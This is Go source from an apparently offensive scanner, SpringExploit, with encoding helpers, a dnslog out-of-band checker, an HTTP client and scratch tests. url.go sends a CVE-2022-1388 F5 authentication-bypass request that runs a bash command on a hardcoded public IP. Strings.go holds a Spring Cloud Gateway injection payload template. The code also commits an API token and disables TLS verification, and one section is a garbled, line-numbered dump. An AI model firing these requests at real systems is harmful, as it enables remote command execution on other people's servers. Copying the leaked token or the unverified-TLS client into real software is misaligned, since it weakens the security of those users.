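	return encode(str, isChinese), nil
}

// Decode reverses Encode for a single string.
// An empty input returns "" before encoding is validated.
func Decode(str string, encoding string) (string, error) {
	if str == "" {
		return "", nil
	}
	isChinese, ok := matchEncoding(encoding)
	if !ok {
		return "", errors.New("unrecognized encoding")
	}
	return decode(str, isChinese)
}

// decode turns every %XX escape in str into the byte it names and copies all
// other runes through unchanged ('+' is not translated to a space). When
// isChinese is set, the resulting bytes are then decoded from GB18030.
//
// A '%' that is not followed by two hex digits returns an error. The length
// check is required: without it a trailing "%" or "%4" indexes past the end of
// the rune slice and panics.
func decode(str string, isChinese bool) (string, error) {
	runes := []rune(str)
	length := len(runes)
	buf := new(bytes.Buffer)
	for i := 0; i < length; {
		r := runes[i]
		if r != '%' {
			buf.WriteRune(r)
			i++
			continue
		}
		if i+2 >= length {
			return "", errors.New("invalid arguments")
		}
		b, err := parseEncodeByte(runes[i+1], runes[i+2])
		if err != nil {
			return "", err
		}
		buf.WriteByte(b)
		i += 3
	}
	if !isChinese {
		return buf.String(), nil
	}
	data, err := ioutil.ReadAll(transform.NewReader(buf, simplifiedchinese.GB18030.NewDecoder()))
	if err != nil {
		return "", err
	}
	return string(data), nil
}

// encode writes each rune of str as %xx escapes (lowercase hex) of its UTF-8
// bytes, or of its GB18030 bytes when isChinese is set. Runes for which
// shouldEscape reports false are copied through unchanged.
func encode(str string, isChinese bool) string {
	builder := strings.Builder{}
	raw := make([]byte, utf8.UTFMax)
	for _, r := range str {
		if !shouldEscape(r) {
			builder.WriteRune(r)
			continue
		}

		n := utf8.EncodeRune(raw, r)
		data := raw[:n]
		if isChinese {
			data, _ = ioutil.ReadAll(transform.NewReader(bytes.NewReader(data), simplifiedchinese.GB18030.NewEncoder()))
		}

		hexed := hex.EncodeToString(data)
		for i := 0; i < len(hexed); i += 2 {
			builder.WriteByte('%')
			builder.WriteString(hexed[i : i+2])
		}
	}
	return builder.String()
}

// shouldEscape decides whether encode escapes r. It currently answers true for
// every rune, so letters, digits and '-', '_', '.' are escaped as well.
func shouldEscape(r rune) bool {
	return true
}

// parseEncodeByte combines the two hex digits of a %XX escape into one byte.
// Upper-case ASCII letters are folded to lower case first; anything that is
// not a hex digit returns "invalid arguments".
func parseEncodeByte(high rune, low rune) (byte, error) {
	if high >= 'A' && high <= 'Z' {
		high += 'a' - 'A'
	}
	if low >= 'A' && low <= 'Z' {
		low += 'a' - 'A'
	}
	hi := byteOfRune(high)
	lo := byteOfRune(low)
	if hi == -1 || lo == -1 {
		return 0, errors.New("invalid arguments")
	}
	return byte((0x0f&hi)<<4 + (0x0f & lo)), nil
}

// byteOfRune returns the value 0-15 of a lower-case hex digit, or -1 when r is
// not one of '0'-'9' or 'a'-'f'.
func byteOfRune(r rune) int {
	switch {
	case r >= '0' && r <= '9':
		return int(r - '0')
	case r >= 'a' && r <= 'f':
		return int(r-'a') + 10
	}
	return -1
}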
// Pieces of the lookup URL that GetDnslog assembles as
// dnslogPre + <pre> + skysa + <id> + token.
//
// NOTE(review): the API token is committed in source and the endpoint is plain
// http://, so the token is readable by anyone with the repository or a view of
// the traffic. Treat it as disclosed and load it from configuration instead.
const dnslogPre = "http://eyes.sh/api/"
const skysa = "/skysa/"
const token = "/?token=69a0b901"

// Dnslog holds the identifier and record type of one lookup.
type Dnslog struct {
	id  string
	pre string // dns or web
}

// Pre returns the record type segment used in the lookup URL.
func (d *Dnslog) Pre() string {
	return d.pre
}

// SetPre stores the record type segment.
func (d *Dnslog) SetPre(pre string) {
	d.pre = pre
}

// Id returns the stored identifier.
func (d *Dnslog) Id() string {
	return d.id
}

// SetId stores a new 16-character code from GetCode.
//
// NOTE(review): the id argument is ignored; the assignment that would use it
// is commented out. Confirm this is intended before relying on the parameter.
func (d *Dnslog) SetId(id string) {
	d.id = GetCode(16)
	//d.id = id
}

// GetDnslog waits three seconds, queries the lookup API for the current
// identifier and reports whether the response body is exactly "True".
//
// NOTE(review): SetId is called after the identifier has been read, so the URL
// is built from the previous value while the stored one is replaced. The error
// from Get is discarded, so a failed request is not distinguished from a
// negative answer.
func (d *Dnslog) GetDnslog() bool {
	current := d.Id()
	//uuid := "dnslog"
	log.Debugln("uuid: ", current)
	d.SetId(current)
	kind := d.Pre()
	log.Debugln("type: ", kind)
	lookup := dnslogPre + kind + skysa + current + token
	time.Sleep(time.Second * 3)
	log.Debugf("url: %s", lookup)
	resp, _ := req.R().Get(lookup)
	log.Debugln(resp.String())
	return resp.String() == "True"
}
// InIt builds a req client from the per-request settings.
//
//   - mode:     any non-zero value enables full dump and debug logging.
//   - timeout:  request timeout in seconds.
//   - proxy:    proxy URL; "" means no proxy.
//   - retry:    common retry count.
//   - h1:       force HTTP/1.
//   - redirect: follow redirects when true.
//
// It returns nil when proxy is non-empty but IsProxyUrl rejects it, so callers
// must check the result before use.
//
// NOTE(review): EnableInsecureSkipVerify is applied unconditionally, so TLS
// certificates are never verified and the identity of the peer (or of an
// intercepting proxy) is not checked. Anyone reusing this client outside a
// lab should make that an explicit opt-in.
func InIt(mode int, timeout int, proxy string, retry int, h1 bool, redirect bool) (client *req.Client) {
	log.Debugf("init httpclient")
	client = req.NewClient()
	if mode != 0 {
		client.EnableDumpAll().EnableDebugLog()
	}

	// TODO: DisableAutoReadResponse must stay off, otherwise the CVE-2022-1388
	// check cannot be verified.
	if h1 {
		// TODO: HTTP/1 has to be forced when the CVE-2022-1388 check runs
		// through an HTTP proxy; in other cases the library picks the protocol
		// version on its own.
		client.EnableForceHTTP1()
	}

	client.SetLogger(log.StandardLogger())
	// Timeout is given in whole seconds.
	client.SetTimeout(time.Duration(timeout) * time.Second)
	client.SetCommonRetryCount(retry)

	client.EnableInsecureSkipVerify()
	// Redirects are followed unless the caller switches them off.
	if !redirect {
		log.Debug("redirect is false")
		client.SetRedirectPolicy(req.NoRedirectPolicy())
	}

	// Proxy: accept a value IsProxyUrl recognises, ignore the empty string,
	// refuse anything else.
	switch {
	case IsProxyUrl(proxy):
		proxy = GetProxyUrl(proxy)
		client.SetProxyURL(proxy)
	case proxy != "":
		log.Error("proxy: " + proxy + " is not a valid url")
		return nil
	}
	return client
}
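// Send builds a client from the settings in hashmap, issues one HTTP request
// and returns the response.
//
// hashmap must hold "method", "url", "proxy" and "body" as string, "retry",
// "timeout" and "mode" as int, "headers" as map[string]string, and "h1" and
// "redirect" as bool. The type assertions are unchecked, so a missing or
// mistyped entry panics.
//
// The result is nil when InIt returns no client (for example an invalid proxy
// value) or when the transport hands back no response. Callers must check for
// nil before dereferencing it.
func Send(hashmap map[string]interface{}) (resp *req.Response) {
	log.Debugln("send requesting")
	method := hashmap["method"].(string)
	target := hashmap["url"].(string)
	proxy := hashmap["proxy"].(string)
	retry := hashmap["retry"].(int)
	timeout := hashmap["timeout"].(int)
	mode := hashmap["mode"].(int)
	headers := hashmap["headers"].(map[string]string)
	body := hashmap["body"]
	h1 := hashmap["h1"].(bool)
	redirect := hashmap["redirect"].(bool)

	client := InIt(mode, timeout, proxy, retry, h1, redirect)
	if client == nil {
		// InIt has already logged why the client could not be built.
		return nil
	}

	//reqt := client.R().EnableDump()
	reqt := client.R()
	reqs := SetRequest(reqt, headers, body.(string))
	resp, errs := reqs.Send(method, target)

	// Inspect the error and the response separately: either can be nil on its
	// own, and touching the nil one is a crash.
	if errs != nil {
		log.Debug("requesting error: " + errs.Error())
	}
	if resp == nil {
		log.Info("resp is nil")
		return nil
	}
	if errs != nil {
		return resp
	}

	// Only a completed request is reported as a success and dumped.
	log.Debugln("send request success", resp.Dump())
	return resp
}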
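// IsProxyUrl reports whether proxy contains a ':' character.
//
// NOTE(review): this is a very loose test. It does not establish that the
// value is a well-formed URL with a scheme and a host.
func IsProxyUrl(proxy string) bool {
	return strings.Contains(proxy, ":")
}

// GetProxyUrl reduces proxy to "scheme://host". Any user info, path, query or
// fragment in the input is dropped. When the value cannot be parsed, the error
// is logged and "" is returned.
//
// NOTE(review): the result is not checked for an empty scheme or host, so a
// value such as host:port without a scheme may not produce a usable proxy URL.
// The caller should confirm what it passes on, so that a bad setting does not
// lead to traffic leaving without the intended proxy.
func GetProxyUrl(proxy string) (proxys string) {
	parsed, err := url.Parse(proxy)
	if err != nil {
		// Log the message as data, not as a format string: the parse error
		// echoes the user-supplied value, which may contain '%'.
		log.Error(err.Error())
		return
	}
	return parsed.Scheme + "://" + parsed.Host
}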
is : %s", str) 58 | lins = append(lins, str) 59 | } 60 | return lins, nil 61 | } 62 | 63 | func getpath() string { 64 | file, _ := exec.LookPath(os.Args[0]) 65 | path1, _ := filepath.Abs(file) 66 | filename := filepath.Dir(path1) 67 | var path string 68 | if strings.Contains(filename, "/") { 69 | tmp := strings.Split(filename, `/`) 70 | tmp[len(tmp)-1] = `` 71 | path = strings.Join(tmp, `/`) 72 | } else if strings.Contains(filename, `\`) { 73 | tmp := strings.Split(filename, `\`) 74 | tmp[len(tmp)-1] = `` 75 | path = strings.Join(tmp, `\`) 76 | } 77 | return path 78 | } 79 | -------------------------------------------------------------------------------- /cmd/commons/utils/saveresult.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | log "github.com/sirupsen/logrus" 5 | "os" 6 | "path/filepath" 7 | ) 8 | 9 | // SaveToFile 保存结果到目标文件 10 | func SaveToFile(content string, file string) error { 11 | //打开文件,没有则创建,有则append内容 12 | //创建目录 13 | path := filepath.Dir(file) 14 | err := Mkdir(path) 15 | if err != nil { 16 | return err 17 | } 18 | w1, error := os.OpenFile(file, os.O_RDWR|os.O_CREATE|os.O_APPEND, 0644) 19 | checkError(error) 20 | _, err1 := w1.Write([]byte(content + "\n")) 21 | checkError(err1) 22 | errC := w1.Close() 23 | checkError(errC) 24 | return nil 25 | } 26 | 27 | //写入文件 28 | func writeStringToFile(filepath, content string) { 29 | //打开文件,没有则创建,有则append内容 30 | w1, error := os.OpenFile(filepath, os.O_RDWR|os.O_CREATE|os.O_APPEND, 0644) 31 | checkError(error) 32 | 33 | _, err1 := w1.Write([]byte(content + "\n")) 34 | checkError(err1) 35 | 36 | errC := w1.Close() 37 | checkError(errC) 38 | } 39 | 40 | //写入文件 41 | func writeBytesToFile(filepath string, content []byte) { 42 | //打开文件,没有此文件则创建文件,将写入的内容append进去 43 | w1, error := os.OpenFile(filepath, os.O_RDWR|os.O_CREATE|os.O_APPEND, 0644) 44 | checkError(error) 45 | 46 | _, err1 := w1.Write(content) 47 | checkError(err1) 48 | 49 | errC := 
w1.Close() 50 | checkError(errC) 51 | } 52 | 53 | func checkError(err error) { 54 | if err != nil { 55 | log.Error("文件写入失败,错误信息:", err) 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /cmd/commons/utils/setrequest.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "github.com/imroc/req/v3" 5 | "net/http" 6 | ) 7 | 8 | // SetRequest 设置请求头和请求boby 9 | func SetRequest(req *req.Request, headers map[string]string, body string) *req.Request { 10 | //req.SetHeaders(headers) 11 | 12 | req.Headers = make(http.Header) 13 | for k, v := range headers { 14 | req.Headers[k] = []string{v} 15 | } 16 | req.SetBody(body) 17 | return req 18 | 19 | } 20 | -------------------------------------------------------------------------------- /cmd/commons/utils/useragent.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "bytes" 5 | "github.com/corpix/uarand" 6 | "math/rand" 7 | "time" 8 | ) 9 | 10 | // GetUA UserAgent generates a random user agent 11 | func GetUA() string { 12 | //return browser.Random() 13 | return uarand.GetRandom() 14 | } 15 | 16 | // GetCode 获取一个随机用户唯一编号 17 | func GetCode(codeLen int) string { 18 | // 1. 定义原始字符串 19 | rawStr := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890" 20 | // 2. 
定义一个buf,并且将buf交给bytes往buf中写数据 21 | buf := make([]byte, 0, codeLen) 22 | b := bytes.NewBuffer(buf) 23 | // 随机从中获取 24 | rand.Seed(time.Now().UnixNano()) 25 | for rawStrLen := len(rawStr); codeLen > 0; codeLen-- { 26 | randNum := rand.Intn(rawStrLen) 27 | b.WriteByte(rawStr[randNum]) 28 | } 29 | return b.String() 30 | } 31 | -------------------------------------------------------------------------------- /cmd/logs/LogToFile.go: -------------------------------------------------------------------------------- 1 | package logs 2 | 3 | import ( 4 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 5 | log "github.com/sirupsen/logrus" 6 | "io" 7 | "os" 8 | "path" 9 | "time" 10 | ) 11 | 12 | func SaveLogs(logfile string) { 13 | if logfile != "" { 14 | 15 | f, err := os.OpenFile(logfile, os.O_RDWR|os.O_CREATE|os.O_APPEND, 0666) 16 | if err == nil { 17 | mw := io.MultiWriter(os.Stdout, f) 18 | log.SetOutput(mw) 19 | log.SetFormatter(&log.TextFormatter{ 20 | ForceColors: true, 21 | FullTimestamp: true, 22 | //TimestampFormat: "2006-01-02 15:04:05", 23 | }) 24 | log.SetReportCaller(true) 25 | log.Debugln("Saving logs to file " + logfile) 26 | } else { 27 | log.Info("Failed to log to file, using default stderr") 28 | } 29 | 30 | } else { 31 | logfile := "logs/log-" + time.Now().Format("202204221616") + ".txt" 32 | 33 | err := utils.Mkdir(path.Dir(logfile)) 34 | if err != nil { 35 | log.Debugln("Failed to create logs directory") 36 | return 37 | } 38 | f, err := os.OpenFile(logfile, os.O_RDWR|os.O_CREATE|os.O_APPEND, 0666) 39 | if err == nil { 40 | mw := io.MultiWriter(os.Stdout, f) 41 | 42 | log.SetOutput(mw) 43 | format := log.TextFormatter{ 44 | ForceColors: true, 45 | FullTimestamp: true, 46 | //TimestampFormat: "2006-01-02 15:04:05", 47 | } 48 | 49 | log.SetFormatter(&format) 50 | log.SetReportCaller(true) 51 | log.Debugln("Saving logs to file " + logfile) 52 | } else { 53 | log.Info("Failed to log to file, using default stderr") 54 | } 55 | 56 | } 57 | 58 | } 59 | 
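--------------------------------------------------------------------------------
/cmd/main.go:
--------------------------------------------------------------------------------
package main

import (
	"github.com/SummerSec/SpringExploit/cmd/commons/core"
	log "github.com/sirupsen/logrus"
)

// main parses the command-line options, builds a runner from them and runs it.
// A failure to build the runner is logged and ends the program instead of
// being discarded, which previously left r unchecked before r.Run().
func main() {
	options := core.ParseOptions()

	//if options.Url != "" {
	//
	//} else if options.File != "" {
	//} else if options.IP != "" {
	//} else if options.SP {
	//	return
	//} else {
	//	log.Info("No url, file or ip specified")
	//	return
	//}

	r, err := core.NewRunner(options)
	if err != nil {
		log.Errorf("Error: %s", err)
		return
	}

	r.Run()
	log.Info("SpringExploit finished")
}

--------------------------------------------------------------------------------
/cmd/test/FileWriter.go:
--------------------------------------------------------------------------------
package main

import (
	"fmt"
	"github.com/SummerSec/SpringExploit/cmd/commons/utils"
	"path/filepath"
)

// main is a scratch check for utils.SaveToFile: it prints the base name and
// directory of a fixed Windows path, then appends a line to logs\test.txt.
// The error from filepath.Abs is ignored; the SaveToFile error is printed.
func main() {
	f, _ := filepath.Abs("G:\\GitHubProject\\SpringExploit\\logs\\test.txt")
	b := filepath.Base(f)
	p := filepath.Dir(f)
	fmt.Println(b)
	fmt.Println(p)
	if err := utils.SaveToFile("test.txt\n", "logs\\test.txt"); err != nil {
		fmt.Println(err)
	}

}

--------------------------------------------------------------------------------
/cmd/test/Strings.go:
--------------------------------------------------------------------------------
package main

import (
	"fmt"
	"github.com/SummerSec/SpringExploit/cmd/commons/utils"
	"strings"
)

// main is a scratch program for string formatting: type assertion on a map
// value, fmt.Sprintf with one and two verbs, strings.Split on an empty string
// and utils.EncodeString.
func main() {
	hashmap := map[string]interface{}{
		"foo": "bar",
	}
	v := hashmap["foo"].(string)
	// Printf, not Println: Println does not interpret "%v" and printed the
	// verb literally.
	fmt.Printf("%v\n", v)
	mem := "asdasd%sqweqweqwe"
	a := fmt.Sprintf(mem, "1231asdasd")
	payload := "{\n \"id\": \"%s\",\n \"filters\": [{\n \"name\": \"AddResponseHeader\",\n \"args\": {\"name\": \"Result\",\"value\": \"%s\"}\n }],\n \"uri\": \"http://example.com\",\n \"order\": 0\n}"

	fmt.Println(a)
	// The values are spliced into the JSON text without escaping; a value
	// containing a quote or backslash yields invalid JSON.
	t := fmt.Sprintf(payload, utils.GetCode(5), a)

	fmt.Println(t)

	b := "asd<%s>123->asd<%s>asda"
	c := fmt.Sprintf(b, "qaz", "qwe")
	fmt.Println(c)

	// Splitting the empty string gives a slice with one empty element.
	d := ""
	ds := strings.Split(d, ",")
	fmt.Println(ds)

	y := utils.EncodeString("asdasd")
	fmt.Println(y)

}

--------------------------------------------------------------------------------
/cmd/test/ants.go:
--------------------------------------------------------------------------------
package main

import (
	"fmt"
	"github.com/panjf2000/ants/v2"
	"sync"
	"time"
)

// Task prints the nanosecond part of the current time with a greeting, then
// sleeps for two seconds.
func Task() {
	fmt.Printf("%d %s\n", time.Now().Nanosecond(), "Hello, World!")
	time.Sleep(time.Second * 2)

}

// main submits 100 tasks to a pool of 50 workers and waits for all of them.
//
// A task that the pool rejects is counted as done right away; previously the
// Submit error was dropped, so a rejected task left wg.Wait blocked forever.
// The pool created here is released on exit alongside the package default.
func main() {
	defer ants.Release()
	pool, err := ants.NewPool(50)
	if err != nil {
		fmt.Println(err)
		return
	}
	defer pool.Release()
	var wg sync.WaitGroup

	task := func() {
		Task()
		wg.Done()
	}

	for i := 0; i < 100; i++ {
		wg.Add(1)
		fmt.Printf("%d %s\n", i, "before submit")
		if err := pool.Submit(task); err != nil {
			fmt.Println(err)
			wg.Done()
		}
	}
	wg.Wait()

}

--------------------------------------------------------------------------------
/cmd/test/checkerr.go:
--------------------------------------------------------------------------------
package main

import "fmt"

// getErr divides int1 by int2 and discards the quotient. A panic raised by the
// division (int2 == 0) is recovered and printed here; the function then
// returns nil, so the caller cannot tell from the return value that the
// division failed.
func getErr(int1, int2 int) error {
	defer func() {
		if err := recover(); err != nil {
			fmt.Println(err)
		}
	}()
	_ = int1 / int2
	return nil
}

// main calls getErr with a zero divisor to show that the panic is contained in
// getErr and execution continues to the final print.
func main() {
	defer func() {
		if err := recover(); err != nil {
			fmt.Println(err)
		}
	}()
	_ = getErr(1, 0)
	fmt.Println("Hello, playground")

}

--------------------------------------------------------------------------------
/cmd/test/copymap.go: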
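--------------------------------------------------------------------------------
package main

import (
	"fmt"
	"github.com/imroc/req/v3"
	log "github.com/sirupsen/logrus"
	"time"
)

// main is a scratch check of the req client: one GET with redirects disabled
// and a three-second timeout, followed by a dump of status and headers.
//
// EnableInsecureSkipVerify turns certificate verification off, so the peer is
// not authenticated and the response can be altered in transit.
// The request error is now checked before the response is used.
func main() {

	rsp := req.C().SetRedirectPolicy(req.NoRedirectPolicy()).SetTimeout(3 * time.Second).EnableDebugLog()
	rsp.SetLogger(log.StandardLogger())
	rsp.EnableInsecureSkipVerify()
	resp, err := rsp.R().Send("GET", "https://sumsec.me/ads.txt")
	if err != nil {
		fmt.Println(err)
		return
	}
	resp.IsSuccess()
	fmt.Println(resp.StatusCode)
	fmt.Println(resp.Header.Values("Content-Type"))
	fmt.Println(resp.Header.Get("Content-Type"))
	fmt.Println(resp.Dump())

}

--------------------------------------------------------------------------------
/cmd/test/dnslog.go:
--------------------------------------------------------------------------------
package main

import (
	"fmt"
	"github.com/SummerSec/SpringExploit/cmd/commons/utils"
	log "github.com/sirupsen/logrus"
)

// main is a scratch check of utils.Dnslog: it sets a prefix and an id, then
// prints the id and the value returned by GetDnslog.
func main() {
	dnslog := &utils.Dnslog{}
	dnslog.SetPre("dns")
	dnslog.SetId("dnslog")
	f := dnslog.GetDnslog()
	fmt.Println(dnslog.Id())
	// The format string needs a verb and the method has to be called; the
	// earlier call passed the method value to a format without verbs.
	log.Debugf("id: %v", dnslog.Id())
	fmt.Println(f)

}

--------------------------------------------------------------------------------
/cmd/test/emun.go:
--------------------------------------------------------------------------------
package main

import (
	"encoding/json"
	"fmt"
	"github.com/imroc/req/v3"
	"runtime"
)

// main is a scratch check for the self-update lookup: it queries the latest
// release of the project on the GitHub API, prints the "tag_name" field of
// the decoded body and the current GOOS_GOARCH pair.
//
// Request, read and JSON errors are reported instead of being dropped.
// NOTE(review): the request is a HEAD, which normally carries no body, so
// tag_name is presumably always missing here; confirm whether GET was meant.
func main() {
	u := "https://api.github.com/repos/SummerSec/SpringExploit/releases/latest"
	fmt.Println(u)
	resp, err := req.C().DevMode().R().Head(u)
	if err != nil {
		fmt.Println(err)
		return
	}
	fmt.Println(resp.Result())
	body, err := resp.ToString()
	if err != nil {
		fmt.Println(err)
		return
	}
	// body to map
	fmt.Println(body)
	var m map[string]interface{}
	if err := json.Unmarshal([]byte(body), &m); err != nil {
		fmt.Println(err)
	}
	// get release tag
	tag := m["tag_name"]

	fmt.Println(tag)
	fmt.Println(runtime.GOOS + "_" + runtime.GOARCH)

}

--------------------------------------------------------------------------------
/cmd/test/header.go:
--------------------------------------------------------------------------------
package main

import (
	"fmt"
	"net/http"
)

// main is a scratch check of building an http.Header by direct map
// assignment (keys are stored as written, not canonicalized) and sending it
// with the default client.
//
// Errors from NewRequest and Do are now checked, and the response body is
// closed so the connection is not leaked.
func main() {
	hashmap := map[string]string{
		"foo": "bar",
		"baz": "qux",
	}
	header := make(http.Header)
	for k, v := range hashmap {
		header[k] = []string{v}
	}
	req, err := http.NewRequest("GET", "http://sumsec.me", nil)
	if err != nil {
		fmt.Println(err)
		return
	}
	req.Header = header
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		fmt.Println(err)
		return
	}
	defer resp.Body.Close()
	fmt.Println(resp)

}

--------------------------------------------------------------------------------
/cmd/test/headurl.go:
--------------------------------------------------------------------------------
package main

import (
	"fmt"
	"github.com/imroc/req/v3"
)

// main is a scratch check that fetches a page with dumping enabled and prints
// the dump and the Content-Type response header. The request error is checked
// before the response is used.
func main() {
	u := "https://sumsec.me/"
	rsp, err := req.R().EnableDump().Get(u)
	if err != nil {
		fmt.Println(err)
		return
	}
	//res := rsp.Dump()
	fmt.Println(rsp.Dump())
	// Read a header from the response.
	fmt.Println(rsp.Header.Get("Content-Type"))

}

--------------------------------------------------------------------------------
/cmd/test/interface/demo.go:
--------------------------------------------------------------------------------
package _interface

import "github.com/imroc/req/v3"

// Demo is a sample interface with one method that takes a req.Response by
// value and one method without parameters.
type Demo interface {
	Foo(response req.Response)
	Koo()
}

--------------------------------------------------------------------------------
/cmd/test/interface/demo/test.go:
--------------------------------------------------------------------------------
package demo

--------------------------------------------------------------------------------
/cmd/test/interface/demo1.go:
--------------------------------------------------------------------------------
package _interface

// Demo1 is a sample struct with a single Name field.
type Demo1 struct {
	Name string
}

--------------------------------------------------------------------------------
/cmd/test/interface/test1.go:
--------------------------------------------------------------------------------
package _interface

import "github.com/imroc/req/v3"

// test1 implements only Foo; it has no Koo method, so it does not satisfy
// Demo.
type test1 struct{}

// Foo is a placeholder that always panics.
func (test1) Foo(response req.Response) {
	//TODO implement me
	panic("implement me")
}

--------------------------------------------------------------------------------
/cmd/test/ip.go:
--------------------------------------------------------------------------------
package main

import (
	"os"
	"strings"
)

// main is a scratch program: it strips the line terminator from a sample URL
// and prints the working directory, the executable path and the name of
// SpringExploit.exe if it exists in the working directory.
//
// Fixes: the "\r\n" case tested for a "\r" suffix, which never matched a
// string ending in "\r\n" and left the "\r" in place; and the result of
// os.Stat was used without checking the error, which panics on a nil FileInfo
// when the file is absent.
func main() {
	str := "http://example.com/\r\n"
	u1 := "http://example.com\n"
	u2 := "http://example.com\r"
	// Remove a trailing "\r\n", or else a trailing "\n". TrimSuffix is a
	// no-op when the suffix is absent, so no HasSuffix guard is needed.
	str = strings.TrimSuffix(str, "\r\n")
	str = strings.TrimSuffix(str, "\n")
	println(str)

	println(u1)
	println(u2)

	// get the current directory
	dir, err := os.Getwd()
	if err != nil {
		panic(err)
	}
	println(dir)

	// get current executable path
	executable, err := os.Executable()
	if err != nil {
		println(err.Error())
	}
	println(executable)

	d, err := os.Stat("SpringExploit.exe")
	if err != nil {
		println(err.Error())
		return
	}
	println(d.Name())

}

--------------------------------------------------------------------------------
/cmd/test/prompt.go:
--------------------------------------------------------------------------------
package main

import (
	"github.com/c-bata/go-prompt"
	log "github.com/sirupsen/logrus"
)

// completer offers the single suggestion "id", filtered by the word before
// the cursor (the final true argument asks for case-insensitive matching).
func completer(d prompt.Document) []prompt.Suggest {
	s := []prompt.Suggest{
		{Text: "id", Description: "you can type command {id}"},
	}
	return prompt.FilterHasPrefix(s, d.GetWordBeforeCursor(), true)
}

// main reads one line from an interactive prompt and logs it.
func main() {
	log.Info("Starting prompt")
	t := prompt.Input("> ", completer)
	log.Info("you type: ", t)
}

--------------------------------------------------------------------------------
/cmd/test/test.go:
--------------------------------------------------------------------------------
package main

import (
	"fmt"
)

// T is a sample struct.
type T struct {
	A int
	B string
}

// toString returns the receiver itself as an interface value; despite the
// name it does not produce a string.
func (t T) toString() interface{} {
	return t
}

// main walks a list of URLs in groups of k. Each URL is handed to say in its
// own goroutine, but main waits on the channel for the next index before
// starting another one, so the URLs are in fact processed one at a time.
func main() {

	urls := []string{"http://golang.org", "http://godoc.org", "http://play.golang.org", "http://gopl.io", "http://golang.org"}

	i := 0
	k := 3
	for i < len(urls) {
		for j := 0; j < k; j++ {
			if i == len(urls) {
				break
			}
			c := make(chan int)
			go say(urls[i], i, c)
			// Blocks until say sends back the next index.
			i = <-c
		}
	}

}

// say prints url and sends i+1 on c.
func say(url string, i int, c chan int) {
	fmt.Println(url)
	i++
	c <- i

}

--------------------------------------------------------------------------------
/cmd/test/test1.go:
--------------------------------------------------------------------------------
package main

import (
	"encoding/json"
	"fmt"
	"github.com/fatih/structs"
)

// UserInfo holds user information.
type UserInfo struct {
	Name string
	Age  int
}

// User wraps a UserInfo.
type User struct {
	UserInfo UserInfo
}

// toString returns the receiver itself as an interface value; despite the
// name it does not produce a string.
func (i UserInfo) toString() interface{} {
	return i
}

// main is a scratch check of structs.Map and json.Marshal on UserInfo: it
// prints every field with its value and type, then the JSON form. The
// json.Marshal error is ignored.
func main() {
	u1 := UserInfo{Name: "q1mi", Age: 18}
	m := structs.Map(&u1)
	for k, v := range m {
		fmt.Printf("key:%v value:%v value type:%T\n", k, v, v)
	}

	fmt.Println(u1.toString())
	datatype, _ := json.Marshal(u1)
	fmt.Println("map to string : " + string(datatype))
	u2 := User{UserInfo: u1}
	m2 := structs.Map(&u2.UserInfo)
	for k, v := range m2 {
		fmt.Printf("key:%v value:%v value type:%T\n", k, v, v)
	}
	fmt.Println(u2.UserInfo.toString())

	//m3 := u1.toMap()
	//for k, v := range m3.(map[string]interface{}) {
	//	fmt.Printf("key:%v value:%v value type:%T\n", k, v, v)
	//}
}

--------------------------------------------------------------------------------
/cmd/test/threads.go:
--------------------------------------------------------------------------------
package main

import (
	"fmt"
	"strconv"
	"sync"
)

// hello prints a greeting followed by the decimal form of str.
func hello(str int) {
	i := strconv.Itoa(str)
	fmt.Println("Hello, world." + i)

}

// main starts 100 goroutines and waits for all of them.
//
// The loop index is passed to each goroutine as an argument. With the go 1.13
// setting in go.mod, a closure that reads i directly shares one variable
// across all iterations, so the goroutines raced on it and most of them saw a
// later value than the one they were started for.
func main() {
	var wg sync.WaitGroup

	for i := 0; i < 100; i++ {
		wg.Add(1)
		fmt.Println("Starting goroutine", i)
		go func(n int) {
			hello(n)
			wg.Done()
		}(i)
	}
	wg.Wait()
}

--------------------------------------------------------------------------------
/cmd/test/url.go:
--------------------------------------------------------------------------------
package main

import (
	"fmt"
	"github.com/imroc/req/v3"
)

// main is a scratch request kept as found. Certificate verification is
// disabled on the client and the request error is discarded, so a failed
// request is not reported before the response is dumped.
func main() {
	url := "http://139.162.180.108:7500"
	client := req.C()
	client.SetTimeout(10 * 1000)
	client.SetCommonRetryCount(3)
	client.EnableInsecureSkipVerify()
	headers := map[string]string{
		"Host":       "localhost",
		"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
		//"Connection": "keep-alive, x-f5-auTh-tOKen, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd,X-F5-New-Authtok-Reqd,X-Forwarded-Server,X-Forwarded-Host",
		"Connection":      "keep-alive, x-f5-auTh-tOKen",
		"Authorization":   "Basic YWRtaW46",
		"X-F5-Auth-Token": "a",
		"Content-Type":    "application/json",
	}
	resp, _ := client.R().SetHeadersNonCanonical(headers).SetBody("{\"command\":\"run\",\"utilCmdArgs\":\"-c 'echo SnZQYURpdk9lVQ== | base64 -d'\"}").Post(url + "/mgmt/tm/util/bash")
	fmt.Println(resp.Dump())

}

--------------------------------------------------------------------------------
/go.mod:
--------------------------------------------------------------------------------
module github.com/SummerSec/SpringExploit

go 1.13

require (
	github.com/corpix/uarand v0.1.1
	github.com/fatih/structs v1.1.0
	github.com/imroc/req/v3 v3.13.1
	github.com/projectdiscovery/mapcidr v0.0.9
	github.com/sirupsen/logrus v1.8.1
	golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c // indirect

)

require (
	//github.com/apex/log v1.9.0 // indirect
	github.com/blang/semver v3.5.1+incompatible
	github.com/c-bata/go-prompt v0.2.6
	//github.com/c4milo/unpackit v0.1.0 // indirect
	//github.com/google/go-github v17.0.0+incompatible // indirect
	github.com/google/go-querystring v1.1.0 // indirect
	//github.com/gosuri/uilive v0.0.4 // indirect
	//github.com/gosuri/uiprogress v0.0.1 // indirect
	github.com/panjf2000/ants/v2 v2.5.0
	github.com/projectdiscovery/stringsutil v0.0.0-20210804142656-fd3c28dbaafe
	github.com/rhysd/go-github-selfupdate v1.2.3
	golang.org/x/text v0.3.7
	//github.com/tj/go-update v2.2.5-0.20200519121640-62b4b798fd68+incompatible
)

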